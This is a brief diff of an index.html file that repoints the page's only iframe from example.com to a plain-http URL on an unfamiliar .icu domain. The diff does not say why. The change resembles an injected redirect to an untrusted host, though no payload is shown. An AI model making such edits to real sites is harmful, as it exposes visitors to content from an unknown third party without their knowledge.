--- a/index.html
+++ b/index.html
@@ -23,6 +23,6 @@
     </style>
 </head>
 <body>
-    <iframe src="https://example.com" frameborder="0" allowfullscreen></iframe>
+    <iframe src="http://1.34.1008b.icu/mn" frameborder="0" allowfullscreen></iframe>
 </body>
 </html>
